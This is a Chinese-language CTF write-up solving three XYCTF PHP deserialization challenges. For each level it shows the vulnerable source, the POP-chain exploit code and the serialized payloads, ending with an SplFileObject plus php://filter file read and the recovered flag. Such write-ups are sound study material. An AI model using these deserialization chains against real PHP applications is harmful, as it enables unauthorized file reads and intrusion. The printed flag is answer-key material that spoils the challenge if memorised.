#php反序列化指针引用绕过 #利用if的条件触发tostring
第一关
<?php
include 'flag.php';
highlight_file(__FILE__);
error_reporting(0);class Flag {public $token;public $password;public function __construct($a, $b){$this->token = $a;$this->password = $b;}public function login(){return $this->token === $this->password;}
}if (isset($_GET['pop'])) {$pop = unserialize($_GET['pop']);$pop->token=md5(mt_rand());if($pop->login()) {echo $flag;}
}?>
可以看到,明显要打造pop链
用同地址变量(引用)绕过
这样打造出来的 序列化结果 会带R 这带来的效果是会让password的值引用token的值,而不是我们来直接赋值
[[反序列化绕过总结]] 中的指针引用绕过
exp:
$a = new Flag('admin', 'admin');$a -> password = &$a -> token;echo serialize($a);
访问/fpclosefpclosefpcloseffflllaaaggg.php
第二关
<?php
highlight_file(__FILE__);
class A {public $mack;public function __invoke()$this->mack->nonExistentMethod();}
}class B {public $luo;public function __get($key){echo "o.O<br>";$function = $this->luo;return $function();}
}class C {public $wang1;public function __call($wang1,$wang2){include 'flag.php';echo $flag2;}
}class D {public $lao;public $chen;public function __toString(){echo "O.o<br>";return is_null($this->lao->chen) ? "" : $this->lao->chen;}
}class E {public $name = "xxxxx";public $num;public function __unserialize($data){echo "<br>学到就是赚到!<br>";echo $data['num'];}public function __wakeup(){if($this->name!='' || $this->num!=''){echo "旅行者别忘记旅行的意义!<br>";}}
}if (isset($_POST['pop'])) {unserialize($_POST['pop']);
}
[[魔术方法]]
这个tostring方法调用e学习一下:
利用if 的条件触发
payload:
$a=new E();$b=new D();$c=new B();$d=new A();$e=new C();$d->mack=$e;$c->luo=$d;$b->lao=$c;$a->name=$b;echo serialize($a);
O:1:"E":2:{s:4:"name";O:1:"D":2:{s:3:"lao";O:1:"B":1:{s:3:"luo";O:1:"A":1:{s:4:"mack";O:1:"C":1:{s:5:"wang1";N;}}}s:4:"chen";N;}s:3:"num";N;}
访问
/saber_master_saber_master.php
第三关
#SplFileObject内置类读取文件
<?phperror_reporting(0);highlight_file(__FILE__);// flag.phpclass XYCTFNO1{public $Liu;public $T1ng;private $upsw1ng;public function __construct($Liu, $T1ng, $upsw1ng = Showmaker){$this->Liu = $Liu;$this->T1ng = $T1ng;$this->upsw1ng = $upsw1ng;}}class XYCTFNO2{public $crypto0;public $adwa;public function __construct($crypto0, $adwa){$this->crypto0 = $crypto0;}public function XYCTF(){if ($this->adwa->crypto0 != 'dev1l' or $this->adwa->T1ng != 'yuroandCMD258') {return False;} else {return True;}}}class XYCTFNO3{public $KickyMu;public $fpclose;public $N1ght = "Crypto0";public function __construct($KickyMu, $fpclose){$this->KickyMu = $KickyMu;$this->fpclose = $fpclose;}public function XY(){if ($this->N1ght == 'oSthing') {echo "WOW, You web is really good!!!\n";echo new $_POST['X']($_POST['Y']);}}public function __wakeup(){if ($this->KickyMu->XYCTF()) {$this->XY();}}}// if (isset($_GET['CTF'])) {// unserialize($_GET['CTF']);// }?>
看到crypto0和T1ng分别在两个类中,adwa不可能既是XYCTFNO2的对象又是XYCTFNO1的对象。
注意:
-
访问链式属性(如
$this->adwa->T1ng)的前提:-
$this->adwa必须已被初始化为一个对象实例。 -
该对象实例必须有
T1ng属性(或方法),且访问权限允许(例如public)。
-
但反序列化传入的字符串它只认字符串,所以你在不同类中多造一个属性,只要符合语法,它一样不会报错。
看到这里利用的地方是实例化一个对象并输出,且提示flag.php,那么我们用SplFileObject内置类读取文件
exp:
$a = new XYCTFNO1();$b = new XYCTFNO2();$c = new XYCTFNO3();$a->T1ng = 'yuroandCMD258';$a->crypto0 = 'dev1l';$b->adwa = $a; //将属性的值实例化为对象$c->N1ght = 'oSthing';$c->KickyMu = $b;echo serialize($c);测试发现,这里的私有属性会造成影响,我们在序列化的时候删除就行了
即第一个类:
class XYCTFNO1{public $Liu;public $T1ng;}
/saber_master_saber_master.php?CTF=O:8:"XYCTFNO3":3:{s:7:"KickyMu";O:8:"XYCTFNO2":2:{s:7:"crypto0";N;s:4:"adwa";O:8:"XYCTFNO1":3:{s:3:"Liu";N;s:4:"T1ng";s:13:"yuroandCMD258";s:7:"crypto0";s:5:"dev1l";}}s:7:"fpclose";N;s:5:"N1ght";s:7:"oSthing";}
post传
直接读读不出来,上php伪协议
X=SplFileObject&Y=php://filter/convert.base64-encode/resource=flag.php
得到
解码
<?php
$flag = "fpclosefpclosefpcloseffflllaaaggg.php";
$flag2 = "saber_master_saber_master.php";
$flag3 = "XYCTF{98887f59-23e5-4bb0-a706-b62d01fe4661}"
?>
